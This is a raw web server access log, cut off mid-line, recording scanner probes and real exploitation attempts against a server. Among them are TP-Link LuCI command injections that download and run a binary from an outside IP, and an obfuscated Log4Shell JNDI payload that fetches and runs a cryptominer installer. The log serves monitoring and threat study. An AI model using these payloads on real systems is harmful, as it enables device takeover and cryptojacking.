45.148.10.174 - - [19/Jun/2024:00:01:24 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [19/Jun/2024:00:01:24 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 172.104.137.47 - - [19/Jun/2024:00:03:08 +0200] "GET / HTTP/1.0" 200 1895 172.104.137.47 - - [19/Jun/2024:00:03:14 +0200] "GET / HTTP/1.1" 200 1895 172.104.137.47 - - [19/Jun/2024:00:03:14 +0200] "GET /Portal0000.htm HTTP/1.1" 404 732 172.104.137.47 - - [19/Jun/2024:00:03:14 +0200] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 1895 172.104.137.47 - - [19/Jun/2024:00:03:14 +0200] "GET / HTTP/1.1" 200 1895 172.104.137.47 - - [19/Jun/2024:00:03:14 +0200] "GET /Portal/Portal.mwsl HTTP/1.1" 404 740 172.104.137.47 - - [19/Jun/2024:00:03:14 +0200] "GET /WIiS HTTP/1.1" 404 722 172.104.137.47 - - [19/Jun/2024:00:03:14 +0200] "GET /inicio.pl HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /__Additional HTTP/1.1" 404 730 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 1895 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /home.pl HTTP/1.1" 404 725 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /docs/cplugError.html/ HTTP/1.1" 404 747 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "HEAD / HTTP/1.1" 200 - 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET / HTTP/1.0" 200 1895 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /nmaplowercheck1718748194 HTTP/1.1" 404 742 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /rest/applinks/1.0/manifest HTTP/1.1" 404 756 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "POST /sdk HTTP/1.1" 404 721 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /home.php HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /pools/default/buckets HTTP/1.1" 404 747 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /confluence/rest/applinks/1.0/manifest HTTP/1.1" 404 771 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /CSS/Miniweb.css HTTP/1.1" 404 737 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET / HTTP/1.1" 200 1895 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /home.jsp HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /HNAP1 HTTP/1.1" 404 723 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /pools HTTP/1.1" 404 723 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "POST /scripts/WPnBr.dll HTTP/1.1" 404 739 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /favicon.ico HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /admin.pl HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /webui HTTP/1.1" 404 723 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /server-status HTTP/1.1" 404 731 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET / HTTP/1.1" 200 1895 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /base.cgi HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET / HTTP/1.0" 200 1895 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "-" 400 1930 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /webui HTTP/1.1" 404 723 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /owa/ HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /default.shtml HTTP/1.1" 404 731 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "HEAD / HTTP/1.0" 200 - 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /.git/HEAD HTTP/1.1" 404 731 172.104.137.47 - - [19/Jun/2024:00:03:15 +0200] "GET /user HTTP/1.1" 404 722 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET /index.html HTTP/1.1" 200 1895 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "CONNECT www.google.com:80 HTTP/1.0" 400 804 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET /owa/ HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET / HTTP/1.1" 200 1895 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET /user HTTP/1.1" 404 722 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET / HTTP/1.0" 200 1895 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET /localstart.jsp HTTP/1.1" 404 732 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET /human.aspx HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "HEAD / HTTP/1.0" 200 - 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET /index.cgi HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET /human.aspx HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET /admin.aspx HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "CONNECT www.wikipedia.org:80 HTTP/1.0" 400 804 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET /dana-cached/hc/HostCheckerInstaller.osx HTTP/1.1" 404 765 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET /inicio.html HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET / HTTP/1.0" 200 1895 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1" 404 752 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET /readme.txt HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "CONNECT www.computerhistory.org:80 HTTP/1.0" 400 804 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET /+CSCOE+/logon.html HTTP/1.1" 404 740 172.104.137.47 - - [19/Jun/2024:00:03:16 +0200] "GET /base.aspx HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:17 +0200] "GET /CFIDE/componentutils/ HTTP/1.1" 404 747 172.104.137.47 - - [19/Jun/2024:00:03:17 +0200] "GET /default.pl HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:17 +0200] "GET /indice.jhtml HTTP/1.1" 404 730 172.104.137.47 - - [19/Jun/2024:00:03:17 +0200] "GET /admin.php HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:17 +0200] "GET /admin.jsp HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:17 +0200] "GET /inicio.jsp HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:17 +0200] "GET /admin.jhtml HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:18 +0200] "GET /localstart.aspx HTTP/1.1" 404 733 172.104.137.47 - - [19/Jun/2024:00:03:18 +0200] "GET /admin.html HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:18 +0200] "GET /admin.cgi HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:18 +0200] "GET /admin.cfm HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:18 +0200] "GET /admin.asp HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:18 +0200] "GET /inicio.cgi HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:18 +0200] "GET /default.jhtml HTTP/1.1" 404 731 172.104.137.47 - - [19/Jun/2024:00:03:19 +0200] "GET /localstart.jsa HTTP/1.1" 404 732 172.104.137.47 - - [19/Jun/2024:00:03:19 +0200] "GET default.asp HTTP/1.1" 400 804 172.104.137.47 - - [19/Jun/2024:00:03:19 +0200] "GET /default.jsa HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:19 +0200] "GET /localstart.pl HTTP/1.1" 404 731 172.104.137.47 - - [19/Jun/2024:00:03:19 +0200] "GET /index.asp HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:19 +0200] "GET /main.cfm HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:20 +0200] "GET /base.pl HTTP/1.1" 404 725 172.104.137.47 - - [19/Jun/2024:00:03:20 +0200] "GET /base.jsp HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:20 +0200] "GET /base.php HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:20 +0200] "GET /main.php HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:20 +0200] "GET /start.jsa HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:20 +0200] "GET /admin.jsa HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:20 +0200] "GET /base.inc HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:21 +0200] "GET /base.asp HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:21 +0200] "GET /menu.jsp HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:21 +0200] "GET /default.php HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:21 +0200] "GET /menu.cfm HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:21 +0200] "GET /base.html HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:21 +0200] "GET /base.cfm HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:21 +0200] "GET /indice.shtml HTTP/1.1" 404 730 172.104.137.47 - - [19/Jun/2024:00:03:22 +0200] "GET /menu.html HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:22 +0200] "GET /indice.pl HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:22 +0200] "GET /inicio.cfm HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:22 +0200] "GET /inicio.asp HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:22 +0200] "GET /start.jsp HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:22 +0200] "GET /home.aspx HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:23 +0200] "GET /home.jsa HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:23 +0200] "GET /indice.jsp HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:23 +0200] "GET /indice.jsa HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:23 +0200] "GET /admin.shtml HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:23 +0200] "GET /home.jhtml HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:23 +0200] "GET /indice.php HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:23 +0200] "GET /index.aspx HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:24 +0200] "GET /indice.cfm HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:24 +0200] "GET /indice.html HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:24 +0200] "GET /main.jsa HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:24 +0200] "GET /indice.asp HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:24 +0200] "GET /index.cfm HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:24 +0200] "GET /home.asp HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:25 +0200] "GET /menu.php HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:25 +0200] "GET /inicio.shtml HTTP/1.1" 404 730 172.104.137.47 - - [19/Jun/2024:00:03:25 +0200] "GET /default.aspx HTTP/1.1" 404 730 172.104.137.47 - - [19/Jun/2024:00:03:25 +0200] "GET /inicio.php HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:25 +0200] "GET /base.jhtml HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:25 +0200] "GET /main.shtml HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:25 +0200] "GET /localstart.shtml HTTP/1.1" 404 734 172.104.137.47 - - [19/Jun/2024:00:03:26 +0200] "GET /main.jhtml HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:26 +0200] "GET /menu.shtml HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:26 +0200] "GET /start.html HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:26 +0200] "GET /index.jhtml HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:26 +0200] "GET /default.jsp HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:26 +0200] "GET /menu.asp HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /start.jhtml HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /inicio.jhtml HTTP/1.1" 404 730 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /index.jsp HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /localstart.jhtml HTTP/1.1" 404 734 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /indice.cgi HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /inicio.jsa HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /localstart.php HTTP/1.1" 404 732 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /base.shtml HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /inicio.aspx HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /localstart.html HTTP/1.1" 404 733 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /menu.aspx HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /start.php HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /menu.pl HTTP/1.1" 404 725 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /localstart.cfm HTTP/1.1" 404 732 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /start.asp HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /localstart.asp HTTP/1.1" 404 732 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /index.php HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /start.shtml HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /start.pl HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /localstart.cgi HTTP/1.1" 404 732 172.104.137.47 - - [19/Jun/2024:00:03:27 +0200] "GET /base.jsa HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /start.cfm HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /start.cgi HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /default.html HTTP/1.1" 404 730 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /home.cgi HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /main.pl HTTP/1.1" 404 725 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /menu.jhtml HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /main.html HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /home.cfm HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /index.shtml HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /home.html HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /default.asp HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /menu.jsa HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /default.cgi HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /main.jsp HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /main.aspx HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /main.cgi HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /index.jsa HTTP/1.1" 404 727 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /robots.txt HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /home.shtml HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /default.cfm HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /menu.cgi HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /main.asp HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /start.aspx HTTP/1.1" 404 728 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /indice.aspx HTTP/1.1" 404 729 172.104.137.47 - - [19/Jun/2024:00:03:28 +0200] "GET /index.pl HTTP/1.1" 404 726 172.104.137.47 - - [19/Jun/2024:00:03:29 +0200] "GET / HTTP/1.0" 200 1895 172.104.137.47 - - [19/Jun/2024:00:03:29 +0200] "GET / HTTP/1.1" 200 1895 78.108.177.50 - - [19/Jun/2024:00:24:30 +0200] "GET / HTTP/1.0" 200 1895 149.50.103.48 - - [19/Jun/2024:01:06:12 +0200] "GET / HTTP/1.1" 200 1895 141.98.11.15 - - [19/Jun/2024:01:28:03 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 87.121.69.27 - - [19/Jun/2024:01:53:07 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 194.59.31.99 - - [19/Jun/2024:01:53:43 +0200] "CONNECT api.ipify.org:443 HTTP/1.1" 400 804 149.50.103.48 - - [19/Jun/2024:02:22:17 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.174 - - [19/Jun/2024:02:44:33 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [19/Jun/2024:02:44:33 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 206.168.32.98 - - [19/Jun/2024:03:14:28 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.98 - - [19/Jun/2024:03:14:32 +0200] "GET / HTTP/1.1" 200 1895 206.168.32.98 - - [19/Jun/2024:03:14:32 +0200] "GET /favicon.ico HTTP/1.1" 404 729 120.92.12.14 - - [19/Jun/2024:03:36:51 +0200] "GET / HTTP/1.1" 200 1895 80.82.78.39 - - [19/Jun/2024:03:45:24 +0200] "GET / HTTP/1.1" 200 1895 80.82.78.39 - - [19/Jun/2024:03:45:26 +0200] "-" 400 1930 194.59.31.99 - - [19/Jun/2024:04:06:37 +0200] "CONNECT api6.ipify.org:443 HTTP/1.1" 400 804 149.50.103.48 - - [19/Jun/2024:04:08:10 +0200] "GET / HTTP/1.1" 200 1895 87.121.69.27 - - [19/Jun/2024:04:36:54 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 94.102.56.99 - - [19/Jun/2024:05:22:48 +0200] "GET / HTTP/1.1" 200 1895 45.148.10.174 - - [19/Jun/2024:05:26:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [19/Jun/2024:05:26:12 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 87.121.69.27 - - [19/Jun/2024:06:04:18 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 141.98.11.15 - - [19/Jun/2024:06:51:10 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 45.148.10.174 - - [19/Jun/2024:07:20:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 756 45.148.10.174 - - [19/Jun/2024:07:20:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 756 149.50.103.48 - - [19/Jun/2024:07:27:31 +0200] "GET / HTTP/1.1" 200 1895 198.235.24.183 - - [19/Jun/2024:07:29:36 +0200] "GET / HTTP/1.0" 200 1895 188.0.131.200 - - [19/Jun/2024:07:29:55 +0200] "GET / HTTP/1.1" 200 1895 185.189.182.234 - - [19/Jun/2024:07:34:37 +0200] "GET / HTTP/1.1" 400 771 172.212.62.145 - - [19/Jun/2024:07:40:31 +0200] "GET / HTTP/1.1" 200 1895 147.185.132.102 - - [19/Jun/2024:08:03:33 +0200] "GET / HTTP/1.1" 200 1895 67.205.130.22 - - [19/Jun/2024:08:11:44 +0200] "-" 400 1930 67.205.130.22 - - [19/Jun/2024:08:11:44 +0200] "-" 400 1930 67.205.130.22 - - [19/Jun/2024:08:11:44 +0200] "GET / HTTP/1.1" 200 1895 67.205.130.22 - - [19/Jun/2024:08:11:44 +0200] "GET /download/powershell/ HTTP/1.1" 404 746 198.235.24.113 - - [19/Jun/2024:08:16:50 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [19/Jun/2024:08:40:20 +0200] "GET / HTTP/1.1" 200 1895 95.214.55.144 - - [19/Jun/2024:08:55:11 +0200] "GET /t(%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//149.12.245.132:3306/TomcatBypass/Command/Base64/a2lsbGFsbCAtOSBwYXJhaXNvLng4Njsga2lsbGFsbCAtOSB4bXJpZzsgY3VybCAtcyAtTCBodHRwOi8vZG93bmxvYWQuYzNwb29sLm9yZy94bXJpZ19zZXR1cC9yYXcvbWFzdGVyL3NldHVwX2MzcG9vbF9taW5lci5zaCB8IExDX0FMTD1lbl9VUy5VVEYtOCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO%7D%27) HTTP/1.1" 404 1214 87.121.69.27 - - [19/Jun/2024:08:56:40 +0200] "CONNECT google.com:443 HTTP/1.1" 400 804 54.84.90.181 - - [19/Jun/2024:09:39:14 +0200] "GET / HTTP/1.1" 200 1895 103.252.136.86 - - [19/Jun/2024:09:42:22 +0200] "CONNECT www.google.com:443 HTTP/1.1" 400 804 147.185.132.177 - - [19/Jun/2024:09:48:41 +0200] "-" 400 1930 147.185.132.177 - - [19/Jun/2024:09:48:41 +0200] "-" 400 1930 185.191.126.213 - - [19/Jun/2024:09:49:01 +0200] "GET / HTTP/1.1" 200 1895 149.50.103.48 - - [19/Jun/2024:09:49:26 +0200] "GET / HTTP/1.1" 200 1895 42.192.92.229 - - [19/Jun/2024:09:53:40 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 754 42.192.92.229 - - [19/Jun/2024:09:53:42 +0200] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 754 42.192.92.229 - - [19/Jun/2024:09:53:42 +0200] "GET /phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 404 761 42.192.92.229 - - [19/Jun/2024:09:53:46 +0200] "GET /phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 404 761 42.192.92.229 - - [19/Jun/2024:09:53:49 +0200] "GET /phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 763 42.192.92.229 - - [19/Jun/2024:09:53:51 +0200] "GET /phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 404 761 42.192.92.229 - - [19/Jun/2024:09:53:51 +0200] "GET /phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 762 42.192.92.229 - - [19/Jun/2024:09:53:52 +0200] "GET /phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 404 761 42.192.92.229 - - [19/Jun/2024:09:54:01 +0200] "GET /phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 404 761 42.192.92.229 - - [19/Jun/2024:09:54:02 +0200] "GET /phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 404 761 42.192.92.229 - - [19/Jun/2024:09:54:09 +0200] "GET /pma/scripts/setup.php HTTP/1.0" 404 747 42.192.92.229 - - [19/Jun/2024:09:54:16 +0200] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 751 42.192.92.229 - - [19/Jun/2024:09:54:34 +0200] "GET /SQL/scripts/setup.php HTTP/1.0" 404 747 42.192.92.229 - - [19/Jun/2024:09:54:41 +0200] "GET /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 760 42.192.92.229 - - [19/Jun/2024:09:54:42 